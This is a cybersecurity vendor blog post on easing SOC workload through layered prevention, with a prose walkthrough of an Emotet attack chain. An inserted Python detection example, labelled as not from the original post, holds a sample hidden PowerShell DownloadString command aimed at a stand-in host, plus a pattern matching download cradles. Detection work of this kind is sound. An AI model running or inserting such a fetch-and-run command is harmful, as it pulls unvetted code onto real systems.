November 17, 2023
As cybersecurity professionals, we know that security operations centers (SOCs) are invaluable, working to help detect a complex array of attacks and to enable effective and timely response efforts. Reacting to cyberattacks is expensive and time-consuming. Industry studies show the average cost of a data breach is approximately $4 million, and it can take months — or even years — for an organization to fully recover from a cyberattack.
Overall, the average cost of operating an SOC can range from $2 million to $7 million per year, with costs ranging much higher for larger and more complex organizations. A recent Devo SOC performance study adds another layer to this cost: analyst burnout. With SOC professionals citing their “pain level” as a six on a scale of 10, it's evident that burnout is a critical operational risk. Given these challenges, it’s clear we must focus not only on detection, but also on the maturity of our prevention and attack surface reduction strategy to help address the growing operational issues and costs.
With a well-calibrated, prevention-focused approach, you can achieve a balanced and effective SOC operation. This approach enhances SOC resilience and efficiency, reducing both operational strain and financial costs.
You’ve probably heard this saying: “An ounce of prevention is worth a pound of detection and response.” This wisdom holds true: A proactive, preventative approach can significantly contribute to creating and maintaining a healthy SOC. Without tuned prevention, more cyberattacks get through, and when attacks get through, there’s a greater burden on the SOC. Incident response is expensive, and optimized prevention reduces cost.
Today, we are at an inflection point, with the complexity and frequency of cyberattacks escalating, resulting in increased strain on SOCs to respond rapidly and effectively. Real-world threat campaigns are more than just one malicious file or a malicious website generating a drive-by download. They are a combination of multiple threat vectors and techniques.
For example, let’s look at a typical Emotet attack, illustrated in the image above. The attack starts with a phishing email that tricks the user into downloading a weaponized Word document and running a macro. The Word document launches a PowerShell script to download Emotet, a well-known trojan. In turn, Emotet downloads additional payloads such as Trickbot, which is designed for various other tasks including harvesting data and stealing credentials, setting the stage for lateral movement. Finally, Trickbot joins the victim’s endpoint to a botnet and downloads other payloads, such as the Ryuk ransomware.
The recombination of techniques and scenarios is endless. It’s important to realize that there are many attack surfaces where prevention technologies and tactics can be used to disrupt or stop attacks, including:
Despite defenses across all these areas, it's unfortunate that attacks still manage to penetrate and succeed.
Does this mean that prevention is broken or ineffective? Or is it possible that organizations aren’t using all the prevention tools at their disposal, or they haven’t tuned their prevention stacks well? The two questions an organization should answer are:
In this blog post, we won't cover every control and lever available to you. Instead, we'll focus on highlighting specific control types within an attack chain and discuss how to strategically layer these preventive measures for improved security outcomes, as demonstrated in the following graphic.
The graphic highlights a few different control types across an attack chain. At the top are the MITRE ATT&CK adversary tactics, which are broad categories of techniques attackers typically use (reading left to right) to attempt to compromise your networks and data.
At the bottom of the graphic (in the boxes) are various control categories that function best in defending against those specific tactics:
The last category (detection and response) is your SOC. Any events that make it to this category create work for your analysts.
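As an added example (not code from the original post or from Optiv), the snippet below applies the idea of the graphic to the Emotet chain described earlier: it scans constructed process-creation events for an Office application launching a script host with a download command, and for each stage it reports the ATT&CK tactic and the control category that acts earliest, i.e. before the event would reach the detection-and-response layer. The event schema, field names, sample events, the stage-to-control mapping and the download-indicator list are assumptions made for illustration; the tactic names are standard ATT&CK tactics, not taken from the page.

```python
"""Added example: flag the Office -> script host -> download stage of an
Emotet-style chain in process-creation telemetry and name the preventive
control category that stops it before it becomes SOC work.
Sample events are constructed; the schema is an assumption, not a vendor's."""

from dataclasses import dataclass
import re


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name, lower-case (assumed field)
    cmdline: str    # full command line (assumed field)


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe"}

# Command-line fragments that indicate a download cradle.
# Assumption: an illustrative list, not an exhaustive one.
DOWNLOAD_HINTS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|https?://)", re.I
)

# Stage -> (ATT&CK tactic, earliest control category that could stop it).
# The mapping is the author's illustration of the graphic, not the page's own.
STAGE_CONTROLS = {
    "office_spawns_shell": (
        "Execution",
        "endpoint security / host intrusion prevention (block Office-spawned script hosts)",
    ),
    "shell_downloads": (
        "Command and Control",
        "web filtering and file reputation (block the download before execution)",
    ),
}


def find_chain(events):
    """Return a finding per stage seen: (stage, pid, tactic, control).

    Only script hosts whose parent is an Office application are considered,
    so an administrator's scheduled PowerShell job is not flagged.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or parent.image not in OFFICE_APPS:
            continue
        if e.image not in SCRIPT_HOSTS:
            continue
        tactic, control = STAGE_CONTROLS["office_spawns_shell"]
        findings.append(("office_spawns_shell", e.pid, tactic, control))
        if DOWNLOAD_HINTS.search(e.cmdline):
            tactic, control = STAGE_CONTROLS["shell_downloads"]
            findings.append(("shell_downloads", e.pid, tactic, control))
    return findings


# Constructed sample: mail client opens a document, the document's macro
# launches a hidden PowerShell download; an unrelated admin script runs too.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "outlook.exe", "outlook.exe"),
    ProcEvent(300, 200, "winword.exe", 'winword.exe /n "invoice.docm"'),
    ProcEvent(400, 300, "powershell.exe",
              "powershell.exe -w hidden -c DownloadString('http://example.invalid/x')"),
    ProcEvent(500, 100, "powershell.exe",
              "powershell.exe -File C:\\Scripts\\inventory.ps1"),
]

if __name__ == "__main__":
    for stage, pid, tactic, control in find_chain(SAMPLE_EVENTS):
        print(f"pid {pid}: {stage} [{tactic}] -> stop with: {control}")
```

Run stand-alone, the script reports two findings for the Word-spawned PowerShell process (pid 400) and none for the administrator's script (pid 500). The point of the mapping is the one the post makes: each of those two findings is an event that a tuned endpoint or web-filtering control could have blocked, and every one that is not blocked becomes an analyst's ticket.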
Various effective controls and strategies can be implemented to tackle operational challenges, alleviate analyst fatigue and reduce overall costs. Elements like host intrusion prevention, endpoint security, host firewalls and network integrity are vital. Additionally, methods for countering zero-day threats, file reputation analysis, behavioral monitoring, emulators, advanced machine learning and endpoint file inspection technologies all contribute to a comprehensive prevention strategy.
Many clients are unaware that disabling or misconfiguring these engines can significantly compromise their threat defense capabilities. I recommend that clients engage a cybersecurity provider for a periodic “health check” to understand their current security posture, the capabilities of the various controls and how those controls interoperate. Using the “monitoring mode” available in many security controls can help maximize several benefits:
It’s time to revisit prevention methods and strategies for reducing the attack surface. By doing so, you can address operational challenges, mitigate the financial risks of cybersecurity incidents and optimize overall SOC costs. Together, we can achieve a more balanced and effective SOC operation, one that is more resilient and efficient, reducing both operational strain and financial costs.
Optiv is the cyber advisory and solutions leader, delivering strategic and technical expertise to nearly 6,000 companies across every major industry. We partner with organizations to advise, deploy and operate complete cybersecurity programs from strategy and managed security services to risk, integration and technology solutions. With clients at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can. At Optiv, we manage cyber risk so you can secure your full potential. For more information, visit www.optiv.com.